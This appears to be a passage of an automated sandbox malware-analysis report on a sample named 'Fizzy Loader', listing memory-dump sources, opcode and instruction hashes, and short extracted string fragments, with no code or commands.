                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3cbe13bd992fb504687d608d11b2deb31cbe809a1f92d7c5fff770714f2cb947
                                                                                                                                                            • Instruction ID: cdcc3cd22a6895896f1e92aa22b51a26c190afebc6f981fb9b5c842378a0c4bf
                                                                                                                                                            • Opcode Fuzzy Hash: 3cbe13bd992fb504687d608d11b2deb31cbe809a1f92d7c5fff770714f2cb947
                                                                                                                                                            • Instruction Fuzzy Hash: 5CF1163190DACA8FEB65EF2888506B67BE1FF95350F0401BAD05DC75C2EE2DA816CB41
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e73d0d4739096c26a2230837dc715fe9c38e4876dcf3da8b55f182a4381955b9
                                                                                                                                                            • Instruction ID: 3911b1a75fccfd767d740cc24834584adbf9e62078a445b6853aa7786ca57e24
                                                                                                                                                            • Opcode Fuzzy Hash: e73d0d4739096c26a2230837dc715fe9c38e4876dcf3da8b55f182a4381955b9
                                                                                                                                                            • Instruction Fuzzy Hash: E6B11671D1E6CA0FE756E77888155E5BFE1EF46390F0801FBD488CB0D3EA28681A8756
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2734670778.00007FF849100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849100000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff849100000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: fb5e9a1a6ed766d77bb8059d722f135f37f4f19c00a70953c688a3b06f92af19
                                                                                                                                                            • Instruction ID: a2a95114d6446a8ce7d641e0f6f0317468006c485cff1d5db872e64b981d5c5a
                                                                                                                                                            • Opcode Fuzzy Hash: fb5e9a1a6ed766d77bb8059d722f135f37f4f19c00a70953c688a3b06f92af19
                                                                                                                                                            • Instruction Fuzzy Hash: A2B10720A0CAC51FE765EF28C4526BAB7D1EF89790F04067ED09EC76D7ED2CA8468741
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: h}H$h}H$h}H$h}H$aH
                                                                                                                                                            • API String ID: 0-687939070
                                                                                                                                                            • Opcode ID: b83edc8b2c72c5ea02d103805f566c0f06568f581c7fefa642719251d12fc9f8
                                                                                                                                                            • Instruction ID: bfcf994a2519eaf68726a374142a4b37f91008cecfc017c50ccf5051c7e7aee6
                                                                                                                                                            • Opcode Fuzzy Hash: b83edc8b2c72c5ea02d103805f566c0f06568f581c7fefa642719251d12fc9f8
                                                                                                                                                            • Instruction Fuzzy Hash: C6E2C130A1EA4E8FEB85EB28C455BAA77E1FF68740F1445BAD009D72D6DF38A841C741

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: HAH$HAH$HAH$yR_H
                                                                                                                                                            • API String ID: 0-1148780016
                                                                                                                                                            • Opcode ID: ea7c458c58bbb8fca017220ca4f80eb632a26ba5a36ff4c7c8b8536e99311cc7
                                                                                                                                                            • Instruction ID: a38d9d582711025f8ce12b7ae7b704dd7fc390a5fad7429f00ff39403e67e605
                                                                                                                                                            • Opcode Fuzzy Hash: ea7c458c58bbb8fca017220ca4f80eb632a26ba5a36ff4c7c8b8536e99311cc7
                                                                                                                                                            • Instruction Fuzzy Hash: 1CA1E631E1CA494FE795EB6C98456B9B7E1FFA9790F00027AD04EE3286DF346C828745

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 8DI$`+I$lN_H
                                                                                                                                                            • API String ID: 0-994944539
                                                                                                                                                            • Opcode ID: d04cfe4827320a13269ec85a75dc10688c7f064efcb6cd752c83bb38c066bc0d
                                                                                                                                                            • Instruction ID: 29f28c5283419e447508ae5323d64bf3277731bc094d257845dd062d66a9a56f
                                                                                                                                                            • Opcode Fuzzy Hash: d04cfe4827320a13269ec85a75dc10688c7f064efcb6cd752c83bb38c066bc0d
                                                                                                                                                            • Instruction Fuzzy Hash: 2762D232E0DA4A4FEB99EB2C9455A7477D2EF99754F1800BEC44EC72E6DF24AC068344
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: aK_H
                                                                                                                                                            • API String ID: 0-2603984226
                                                                                                                                                            • Opcode ID: ebe139fb4f3e6c644e77dd8b27c79ddac8248eb40d81ce39440e6bc9d7d41e12
                                                                                                                                                            • Instruction ID: d08b1857a8eb8361a85a6b9c6a6c41c48a37f09bb156cc9d52514591051773c6
                                                                                                                                                            • Opcode Fuzzy Hash: ebe139fb4f3e6c644e77dd8b27c79ddac8248eb40d81ce39440e6bc9d7d41e12
                                                                                                                                                            • Instruction Fuzzy Hash: 8B43403060DA8A8FDB85FF28C458BA977E1FF69744F1405BAD40DDB296DE38A845CB00
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: +($F_^
                                                                                                                                                            • API String ID: 0-3088106727
                                                                                                                                                            • Opcode ID: c84b820a797d170d317dfb4aa858d9cbd94ab16b693b4bafb9ab74dd831f2e63
                                                                                                                                                            • Instruction ID: 04d59cf39a47eb16bd5ee85c5ccf1e500a5721eb715fb151b84d47fb97de9c2b
                                                                                                                                                            • Opcode Fuzzy Hash: c84b820a797d170d317dfb4aa858d9cbd94ab16b693b4bafb9ab74dd831f2e63
                                                                                                                                                            • Instruction Fuzzy Hash: A602B03191D64A8FEB94FB28D0907B677A1EF5139CF1441BAC08D8A1C7DF2DA886C794
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: HAH$HAH
                                                                                                                                                            • API String ID: 0-524784639
                                                                                                                                                            • Opcode ID: f66b6d97633369fa8db8897c60c409cb6544f7e442741c2aceee802c0589c00e
                                                                                                                                                            • Instruction ID: ba3e9765f0937eb76ffe75ba418f59d3310b13746d0f944009597bf3f5ff70df
                                                                                                                                                            • Opcode Fuzzy Hash: f66b6d97633369fa8db8897c60c409cb6544f7e442741c2aceee802c0589c00e
                                                                                                                                                            • Instruction Fuzzy Hash: B6811631A1CE494FE798EBAC94456B9B7E1FFA8791F04427BD00ED3295CF34A8468781
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: aH
                                                                                                                                                            • API String ID: 0-2191227055
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: _
                                                                                                                                                            • API String ID: 0-701932520
                                                                                                                                                            • Opcode ID: fa8db52151d67cd1e7ab09ccf251247357c37c92ae212000abe762c533f4efef
                                                                                                                                                            • Instruction ID: 9b15909b66456e00539fea57783bee4b88050bb046806f9903fc77dc9552fb61
                                                                                                                                                            • Opcode Fuzzy Hash: fa8db52151d67cd1e7ab09ccf251247357c37c92ae212000abe762c533f4efef
                                                                                                                                                            • Instruction Fuzzy Hash: 25512032B1CA444FE768E61CA8516FAB7D1EFC5364F0405BFD089C3183DE29A8068395
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: K_^
                                                                                                                                                            • API String ID: 0-847152731
                                                                                                                                                            • Opcode ID: 04fa3aa1495d7dd83a32cdeba19ee7839062927d86a7ca35354e8d19025f8724
                                                                                                                                                            • Instruction ID: 9da98ce854d7adfb948d77755464b934f33085f802243549d8e7117ca7d86d40
                                                                                                                                                            • Opcode Fuzzy Hash: 04fa3aa1495d7dd83a32cdeba19ee7839062927d86a7ca35354e8d19025f8724
                                                                                                                                                            • Instruction Fuzzy Hash: D961233291E6DA0EE762A33458111F57FA0EF536A0F4901FBD48CDB1E3DA1D681A8396
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: PJ_^
                                                                                                                                                            • API String ID: 0-649389504
                                                                                                                                                            • Opcode ID: 2f6316aa01543cac5135542e3dc7bf901a21a431bad864fd46ebd88f04aac900
                                                                                                                                                            • Instruction ID: f9b7c58a04bca0537c2c337b0013d1c32346466c212d6b5974bfe86ed9e098b7
                                                                                                                                                            • Opcode Fuzzy Hash: 2f6316aa01543cac5135542e3dc7bf901a21a431bad864fd46ebd88f04aac900
                                                                                                                                                            • Instruction Fuzzy Hash: 6051A030A2CA064FE328EB1CD485A71B3E1FB94354B1456BDD48BC7697DE25F8438B84
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 8[H
                                                                                                                                                            • API String ID: 0-2136615853
                                                                                                                                                            • Opcode ID: 82c99049eb7e6deedf547c374c36281ea4d12d10d511a8207344215b4b892a1c
                                                                                                                                                            • Instruction ID: 5f46ca378f2c86b1de0283a9b6877f526e34b0fd99093e9d5f346c47c72f6c71
                                                                                                                                                            • Opcode Fuzzy Hash: 82c99049eb7e6deedf547c374c36281ea4d12d10d511a8207344215b4b892a1c
                                                                                                                                                            • Instruction Fuzzy Hash: 2851F532D0EACA4FE756AB7858255B57FE1EF62A50F0801FBD048CB1D7DE08590A8366
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: _
                                                                                                                                                            • API String ID: 0-701932520
                                                                                                                                                            • Opcode ID: f323d68ef423dbddaa66ad132e1441e0673932a13e70e45e6910379ebbcb3e8d
                                                                                                                                                            • Instruction ID: 35e5946a6d0a266f877d1c1f7ef73b209a8bbcef1233c40b53d3dd7ee78d9ad0
                                                                                                                                                            • Opcode Fuzzy Hash: f323d68ef423dbddaa66ad132e1441e0673932a13e70e45e6910379ebbcb3e8d
                                                                                                                                                            • Instruction Fuzzy Hash: 2651D23191E98A9FE749EB7888295B97BB1EF56344F0801BAC04DE71E3DE2C2902C715
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: aK_H
                                                                                                                                                            • API String ID: 0-2603984226
                                                                                                                                                            • Opcode ID: 39a0a27acea587948c6e9c591ad9b3586082e61a97644fffb0efc0e96ecad8b8
                                                                                                                                                            • Instruction ID: 430d8eae829212ae4958e060fabeb743a44ea9325104a0a1bff43e1f9837602b
                                                                                                                                                            • Opcode Fuzzy Hash: 39a0a27acea587948c6e9c591ad9b3586082e61a97644fffb0efc0e96ecad8b8
                                                                                                                                                            • Instruction Fuzzy Hash: 5A513C71A08A4A8FDBC8EF1CC488AA573E1FFA9740F1446B6D41DC7296DF34E8468B54
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: <G_H
                                                                                                                                                            • API String ID: 0-2873658233
                                                                                                                                                            • Opcode ID: bd347d934438d4a1af1c50a60b22647bc2b227b5a2c210251cd5f04320fd26d2
                                                                                                                                                            • Instruction ID: 33970bdc33b05baad3d05fed4155f6e31d016acbbaeec814b81f36832ff23e7e
                                                                                                                                                            • Opcode Fuzzy Hash: bd347d934438d4a1af1c50a60b22647bc2b227b5a2c210251cd5f04320fd26d2
                                                                                                                                                            • Instruction Fuzzy Hash: 6351C531A1CA0A8FE765FB289840976B3E1FFE5794F0405B9D84AC36D5EF24F8458784
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: QI_L
                                                                                                                                                            • API String ID: 0-1878478260
                                                                                                                                                            • Opcode ID: 9be994b34e3e40bfd70e62529faf8c64f434022e8463c5f11eda2fb3756badbc
                                                                                                                                                            • Instruction ID: 15fd2c66b8335a872cd089f9e0e7d93e0f68bba626764da0550842db4eb16456
                                                                                                                                                            • Opcode Fuzzy Hash: 9be994b34e3e40bfd70e62529faf8c64f434022e8463c5f11eda2fb3756badbc
                                                                                                                                                            • Instruction Fuzzy Hash: 4441E26190DBC65FE356AB7C48592A13FE1DF5B250B0A41FBD089CB0E3E9196C078365
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: p{I
                                                                                                                                                            • API String ID: 0-2826010440
                                                                                                                                                            • Opcode ID: 857953b2011e9fad6275d03f0d30eb5ceb651faa082be7fbb3f5a6afe6f98c2e
                                                                                                                                                            • Instruction ID: ca06f79f40864e6b20e4a9739da52de05083a514dfd21f0d62742aca70300680
                                                                                                                                                            • Opcode Fuzzy Hash: 857953b2011e9fad6275d03f0d30eb5ceb651faa082be7fbb3f5a6afe6f98c2e
                                                                                                                                                            • Instruction Fuzzy Hash: 89316B3091DF895ED768AB2884457B7B7E1EB68354F00096ED08FC3692DF68B4018796
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 8[H
                                                                                                                                                            • API String ID: 0-2136615853
                                                                                                                                                            • Opcode ID: 10de72d4e9133ffc379dfb5e42959442a014a11efecb29d7e5a2f3e4bf1e598d
                                                                                                                                                            • Instruction ID: f608eecdaf78bb01f99847219e94b0385a542a605b6ab76f998bfd5df8d3ac82
                                                                                                                                                            • Opcode Fuzzy Hash: 10de72d4e9133ffc379dfb5e42959442a014a11efecb29d7e5a2f3e4bf1e598d
                                                                                                                                                            • Instruction Fuzzy Hash: 6231F431E1E84A9FEB84BB6C84156BA7BE1EF64750F0441BBD00DC71C7EE1CA8058754
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ]J_^
                                                                                                                                                            • API String ID: 0-3571334429
                                                                                                                                                            • Opcode ID: e6de60ed725c322a8950dcfd4adabec224dc186bb986f8fcae015334a58076e0
                                                                                                                                                            • Instruction ID: 5b8e13be722ac366ea1d0908ad27e98aeafefe4f4be10e9843f9a80da8e72e59
                                                                                                                                                            • Opcode Fuzzy Hash: e6de60ed725c322a8950dcfd4adabec224dc186bb986f8fcae015334a58076e0
                                                                                                                                                            • Instruction Fuzzy Hash: FE216516A1F1A26AE75273BD34551FA6FA0DF961BCF0C46B3D08C8D093CE0C148A826E
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            • Opcode Fuzzy Hash: e85d5e24b2f7edfdee1aa31ef82a26078596a934c0e75f78d57ec169d60ea60b
                                                                                                                                                            • Instruction Fuzzy Hash: 7EC16830A1D2464FF7A8BB288415279B7C2EF867E0F14447ED49FC72D7DE2C6846820A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 64374a4ff6945d7e0f5b574a8218d7462f3fb0cf843e41d1a5050805371c3fc2
                                                                                                                                                            • Instruction ID: c07d66e455800b67504ece7ffc89f8e7e6fc093375bdcaa63c09b0335d08d5f8
                                                                                                                                                            • Opcode Fuzzy Hash: 64374a4ff6945d7e0f5b574a8218d7462f3fb0cf843e41d1a5050805371c3fc2
                                                                                                                                                            • Instruction Fuzzy Hash: 18A15031F0CA0B0FEBA9BB2854557B92382EF957C5F544479D40DD72C6DF29AC83828A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ccd3ec5aee9ec3e8509141458e72f051ff2081c8d843800f0c137c8630adcf9e
                                                                                                                                                            • Instruction ID: 4c01634837995195b48c46a697efa451d4ca501261c7bc6dedcb17580ccbb3c0
                                                                                                                                                            • Opcode Fuzzy Hash: ccd3ec5aee9ec3e8509141458e72f051ff2081c8d843800f0c137c8630adcf9e
                                                                                                                                                            • Instruction Fuzzy Hash: A0B1047180E6CA4FE756E73858155E5BFE0EF86390F0901FBD489CB0E3EA2C590A8356
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9004dfb0cc28103c271d5bf1cb9e98f345ad5b571d31daadf11ae1f6ec3de5e8
                                                                                                                                                            • Instruction ID: 04b4a6b224c74af7f571ebc54d3b84d299a15b4585e3f7a26627743edda3d529
                                                                                                                                                            • Opcode Fuzzy Hash: 9004dfb0cc28103c271d5bf1cb9e98f345ad5b571d31daadf11ae1f6ec3de5e8
                                                                                                                                                            • Instruction Fuzzy Hash: 30B1053180E6CA5FE756F77888156E5BFE0EF46390F0901FAD44CCB0D3EA29590A8756
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0ce7f94b821f0c815e755d9ff33cf01c0443c37d72dc009e1b9ff60a9f9bd642
                                                                                                                                                            • Instruction ID: ceaccbccb9da8ab1a7c1fba8801ffd730e143649fa041df0118cba7ae714ccba
                                                                                                                                                            • Opcode Fuzzy Hash: 0ce7f94b821f0c815e755d9ff33cf01c0443c37d72dc009e1b9ff60a9f9bd642
                                                                                                                                                            • Instruction Fuzzy Hash: 39A1E130A2CA464FD369EB28D480971B7E1FF95350B1446BEC48AC76A7DE25FC438B84
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7dbe051cf6aad27e020ce3f40c0d50994f0071f5856418bd60d43b591850ece2
                                                                                                                                                            • Instruction ID: 94e2abf6c6af875038e640cf4a047938421119857c9de8deb452d6a7d2089988
                                                                                                                                                            • Opcode Fuzzy Hash: 7dbe051cf6aad27e020ce3f40c0d50994f0071f5856418bd60d43b591850ece2
                                                                                                                                                            • Instruction Fuzzy Hash: 39A1F57180EACA4FE756A77858255A5BFE0EF47390F0901FBD488CB0D3DB18590AC75A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3694e917fe4185b62a2cb838ff6b61fa0f15e974f52e219b64a56306abf58926
                                                                                                                                                            • Instruction ID: 8000a9e77d23b94874ed30c24cc247c9440849281971cc57dda1504c9b16a725
                                                                                                                                                            • Opcode Fuzzy Hash: 3694e917fe4185b62a2cb838ff6b61fa0f15e974f52e219b64a56306abf58926
                                                                                                                                                            • Instruction Fuzzy Hash: EFA1037180EACA0FE756A77888255E6BFE0EF47390F0905FBD488CB4D3DA58590A8356
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1dbaa94e269986f9b37e76a2a6619d5b814c7501605dd12a51579dd762645134
                                                                                                                                                            • Instruction ID: b979fe7a37a2b06e25eff855f845315db5c210e359d2ea5ef7b249d27686da02
